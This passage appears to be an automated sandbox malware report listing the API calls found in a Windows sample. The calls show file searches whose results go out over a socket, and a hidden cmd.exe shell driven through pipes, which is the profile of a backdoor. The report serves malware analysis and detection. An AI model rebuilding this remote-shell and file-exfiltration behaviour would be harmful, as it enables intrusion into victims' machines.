                              • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00402D4C
                              • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00402D56
                              • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00402D60
                              • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,004107BC,?), ref: 00402D86
                              • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 00402D90
                              • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 00402D97
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 00402DA6
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(searchwrongpath,?), ref: 00402DC5
                              • _CxxThrowException.MSVCRT(00000002,00411A80), ref: 00402DE9
                              • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00402DF8
                              • wcscmp.MSVCRT ref: 00402E25
                              • wcscmp.MSVCRT ref: 00402E3D
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0041079C), ref: 00402E62
                              • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00402E74
                              • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00402E84
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00402E92
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00402E9E
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402EAD
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402EBF
                                • Part of subcall function 00403183: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00415268,76EAA270), ref: 00403198
                                • Part of subcall function 00403183: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,00415268,76EAA270), ref: 004031A7
                                • Part of subcall function 00403183: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,00415268,76EAA270), ref: 004031B1
                                • Part of subcall function 00403183: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,00415268,76EAA270), ref: 004031BB
                                • Part of subcall function 00403183: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,004107BC,?), ref: 004031DE
                                • Part of subcall function 00403183: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?), ref: 004031E8
                                • Part of subcall function 00403183: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 004031EF
                                • Part of subcall function 00403183: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?), ref: 004031FB
                                • Part of subcall function 00403183: FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 00403215
                                • Part of subcall function 00403183: wcscmp.MSVCRT ref: 00403247
                                • Part of subcall function 00403183: wcscmp.MSVCRT ref: 0040325F
                                • Part of subcall function 00403183: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0000005C), ref: 00403277
                                • Part of subcall function 00403183: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,000000FF,00000000), ref: 00403286
                                • Part of subcall function 00403183: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,00000000), ref: 00403293
                                • Part of subcall function 00403183: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040329E
                                • Part of subcall function 00403183: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004032A7
                                • Part of subcall function 00403183: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004032B6
                                • Part of subcall function 00403183: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004032C5
                              • _CxxThrowException.MSVCRT(00000003,00411A80), ref: 00402EE6
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000003,00411A80), ref: 00402EF1
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?), ref: 00402F0B
                              • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,?), ref: 00402F1D
                              • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00402F2A
                              • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000,?,?,?), ref: 00402F37
                              • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000), ref: 00402F52
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000010,00000250,?), ref: 00402F7F
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402F89
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402F95
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,filefound,00415268,00000000,00415268,?), ref: 00402FC7
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,00415268,?), ref: 00402FD7
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?), ref: 00402FE7
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?), ref: 00402FF1
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00403015
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00403021
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 0040302D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 00403039
                              • _CxxThrowException.MSVCRT(00000004,00411A80), ref: 00403059
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000004,00411A80), ref: 00403064
                              • FindClose.KERNEL32(000000FF,?,?,?), ref: 00403076
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,searchfinished,00415268,?,00415268,?), ref: 00403099
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,?), ref: 004030A9
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,?), ref: 004030B9
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,?), ref: 004030C3
                                • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 00402590
                                • Part of subcall function 00402504: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 0040259A
                                • Part of subcall function 00402504: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000), ref: 004025B4
                                • Part of subcall function 00402504: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004021B2), ref: 004025BE
                                • Part of subcall function 00402504: send.WS2_32(?,00000000), ref: 004025C8
                                • Part of subcall function 00402504: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,004021B2,?,0040A446), ref: 004025D2
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004030D9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004030E5
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004030F1
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268), ref: 004030FA
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 00403112
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040311B
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 00403124
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 0040312D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00415268,?), ref: 00403136
                              • atoi.MSVCRT ref: 00403101
                                • Part of subcall function 00403474: _EH_prolog.MSVCRT ref: 00403479
                                • Part of subcall function 00403474: closesocket.WS2_32(?), ref: 004034BB
                                • Part of subcall function 00403474: TerminateThread.KERNEL32(?,00000001,00000000,?,00000001,00000001,00000000,00000000,6A41AFB0,6A41AFB0,?,?,0040C61E,00000000), ref: 004034CD
                              • _CxxThrowException.MSVCRT(00000000,00000000), ref: 0040314F
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000000,00415278,00000010,00000000,00000001,00000006), ref: 00403157
                              • atoi.MSVCRT ref: 0040315E
                              • FindClose.KERNEL32(?), ref: 0040316F
                              • ExitThread.KERNEL32 ref: 00403177
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$G@2@@std@@$??1?$basic_string@$Hstd@@V?$basic_string@$D@2@@0@$??0?$basic_string@V10@0@$?begin@?$basic_string@FindG@2@@0@V01@@$?c_str@?$basic_string@D@1@@ExceptionThrow$?length@?$basic_string@FileV10@wcscmp$?end@?$basic_string@G@1@@V10@@$??4?$basic_string@?data@?$basic_string@CloseFirstH_prologNextThreadV01@atoisend$?empty@?$basic_string@?find@?$basic_string@A?$basic_string@ExitTerminateV12@closesocketconnectsocket
                              • String ID: filefound$searchfinished$searchstarted$searchwrongpath
                              • API String ID: 525724632-2241827744
                              • Opcode ID: 4cfbcc5f81053ed4c7e8ab2eb33a0575d2b32ec319bc07ce2901e7367b85f66b
                              • Instruction ID: 37d5ccb0cac30d8a9bba9e41291a70e7b7d0e58fcafd169c2c2f7e39e65e0a14
                              • Opcode Fuzzy Hash: 4cfbcc5f81053ed4c7e8ab2eb33a0575d2b32ec319bc07ce2901e7367b85f66b
                              • Instruction Fuzzy Hash: 97D11F72900119ABDB15EB60DD8EADE777CAF14305F0041BAF50AA2091EF795F89CF58
                              Function 0040E8B9 Relevance: 108.8, APIs: 59, Strings: 3, Instructions: 328pipesleepprocessCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1215 40e8b9-40e8dd call 40fcf0 1218 40e8fd-40e92a ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z * 2 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 1215->1218 1219 40e8df-40e8fc ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z call 40fcba 1215->1219 1221 40e92c-40e939 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z 1218->1221 1222 40e93d-40e9e5 CreatePipe GetStdHandle ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ * 2 CreateProcessA Sleep 1218->1222 1219->1218 1221->1222 1224 40e9eb-40e9ff PeekNamedPipe 1222->1224 1225 40ec2e 1222->1225 1226 40ea01-40ea1b ReadFile 1224->1226 1227 40ea1d 1224->1227 1228 40ec34-40ec45 CloseHandle * 2 1225->1228 1231 40ea20-40ea23 1226->1231 1227->1231 1229 40ec56-40ecac ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z * 2 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 1228->1229 1230 40ec47-40ec54 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z 1228->1230 1232 40ecb2-40ecd1 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 3 1229->1232 1230->1232 1233 40ea25-40ea59 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 1231->1233 1234 40ea5e-40ea61 1231->1234 1235 40ebf9-40ebfc 1233->1235 1234->1235 1236 40ea67-40ea7f ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 1234->1236 1235->1224 1237 40ec02-40ec05 1235->1237 1236->1235 1238 40ea85-40eacf ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z 1236->1238 1239 40ec11-40ec2c WaitForSingleObject CloseHandle * 2 1237->1239 1240 40ec07-40ec0b TerminateProcess 1237->1240 1241 40ead1-40eb04 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z 1238->1241 1242 40eb06-40eb08 1238->1242 1239->1228 1240->1239 1243 40eb42-40eb5d ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 1241->1243 1244 40eb09-40eb16 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z 1242->1244 1247 40ebc0-40ebcd ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ 1243->1247 1248 40eb5f-40eb68 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ 1243->1248 1245 40eb20-40eb3f ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z 1244->1245 1246 40eb18-40eb1b 1244->1246 1245->1243 1246->1245 1249 40eb1d-40eb1e 1246->1249 1251 40ebf1-40ebf3 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z 1247->1251 1252 40ebcf-40ebef ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@DABV10@@Z ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 1247->1252 1248->1235 1250 40eb6e-40ebb2 ?rfind@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z 1248->1250 1249->1244 1250->1235 1253 40ebb4-40ebbe ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z 1250->1253 1251->1235 1252->1235 1253->1235
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,76E50440,00415268,6A41AFB0,?,0040AD3E,?), ref: 0040E8EC
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,76E50440,00415268,6A41AFB0,?,0040AD3E,?), ref: 0040E904
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0040AD3E,?), ref: 0040E911
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,cmd.exe,?,0040AD3E,?), ref: 0040E920
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(C:\,?), ref: 0040E933
                              • CreatePipe.KERNEL32 ref: 0040E95B
                              • GetStdHandle.KERNEL32 ref: 0040E98B
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000044,?), ref: 0040E9B3
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 0040E9C3
                              • CreateProcessA.KERNEL32(00000000,00000000), ref: 0040E9CB
                              • Sleep.KERNEL32(?,000001F4), ref: 0040E9DC
                              • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0040E9F6
                              • ReadFile.KERNEL32(?,?,0000C350,00000000,00000000), ref: 0040EA15
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040EA39
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040EA43
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EA4F
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00411890,00000000), ref: 0040EA71
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00411890,00000000,6A3F5E04), ref: 0040EA8C
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000002), ref: 0040EA9F
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040EAA9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EAB5
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP60(00000022,00000000), ref: 0040EAC1
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP60(00000022,00000001), ref: 0040EADA
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,-00000002), ref: 0040EAEE
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040EAF8
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EB42
                              • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410C1C), ref: 0040EB51
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040EB5F
                              • ?rfind@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP60(0000005C,6A3F5E04), ref: 0040EB79
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0040EB87
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040EB90
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040EB99
                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP60(0000005C,00000000), ref: 0040EBA4
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(0000005C), ref: 0040EBB8
                              • TerminateProcess.KERNEL32(?,00000000), ref: 0040EC0B
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040EC16
                              • CloseHandle.KERNEL32(?), ref: 0040EC25
                              • CloseHandle.KERNEL32(?), ref: 0040EC2A
                              • CloseHandle.KERNEL32(?), ref: 0040EC37
                              • CloseHandle.KERNEL32(?), ref: 0040EC3C
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040EC4E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,?,0000000D,0000000A,00415B80,0000003E), ref: 0040EC69
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000,?,00000000,?), ref: 0040EC76
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00000000,?), ref: 0040EC83
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(00000000,00000000,?,?,?,?,?,?,?,00000000,?), ref: 0040EC8F
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040EC9A
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040ECA3
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040ECAC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040ECB5
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040ECBE
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040ECC7
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@V01@V?$basic_string@$??0?$basic_string@?find@?$basic_string@HandleV01@@$??4?$basic_string@CloseD@1@@Hstd@@$?substr@?$basic_string@V10@V12@$??8std@@?c_str@?$basic_string@CreatePipeProcessY?$basic_string@$?length@?$basic_string@?rfind@?$basic_string@FileNamedObjectPeekReadSingleSleepTerminateV10@0@Wait
                              • String ID: C:\$D$cmd.exe
                              • API String ID: 868804582-2369035250
                              • Opcode ID: 9d8aa3c5ac5b6c181e9ade171bcb4f198173e56150405ac709c8867344b16d22
                              • Instruction ID: 6ad45e127cb324f962e26fd75bd9daacbf5f14a3686954285d58c0458e4bac89
                              • Opcode Fuzzy Hash: 9d8aa3c5ac5b6c181e9ade171bcb4f198173e56150405ac709c8867344b16d22
                              • Instruction Fuzzy Hash: 01C13E7190411DEFDB14DBA0DC98EEE7B79FB44304F1084BAF506A61A0DB795E85CB18
